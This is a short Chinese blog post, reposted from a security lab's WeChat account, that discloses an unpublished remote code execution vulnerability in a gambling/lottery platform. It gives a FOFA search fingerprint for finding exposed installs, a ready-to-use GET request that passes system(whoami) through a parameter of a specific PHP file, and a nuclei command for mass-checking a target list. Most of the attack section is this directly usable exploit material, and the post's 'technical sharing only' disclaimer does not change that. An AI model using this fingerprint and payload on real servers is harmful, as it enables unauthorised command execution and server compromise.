某彩票 任意代码执行漏洞(未公布)

0x01 漏洞描述

网络赌博是指通过互联网手段(非法赌博网站、博彩App、微信群等)进行的赌博活动。由于网络赌博不合法,资金不受法律保护,有很多“出老千”的行为,很多人被骗后往往不敢报警,导致家破人亡,所以打击赌博,刻不容缓。某菠菜系统系统存在任意代码执行漏洞,攻击者通过漏洞可以执行任意命令,导致服务器失陷。

图片[1]-某彩票 任意代码执行漏洞(未公布)-安全小天地

0x02 漏洞复现

fofa:newindex/static/js/16070610231968312.js

1.执行whoami命令的POC,返回用户名

http://{{Hostname}}/lib/classes/googleChart/markers/GoogleChartMapMarker.php?google88990=system(whoami);

2.nuclei批量验证脚本已发表于知识星球

nuclei.exe -t Laojiumen_Caipiao_RCE.yaml -l subs.txt -stats
图片[2]-某彩票 任意代码执行漏洞(未公布)-安全小天地

(注:本文章为技术分享,禁止任何非授权攻击行为)

本文转载自公众号: 融云攻防实验室,原文地址:某彩票 任意代码执行漏洞(未公布)

© 版权声明
THE END
喜欢就支持一下吧
点赞15 分享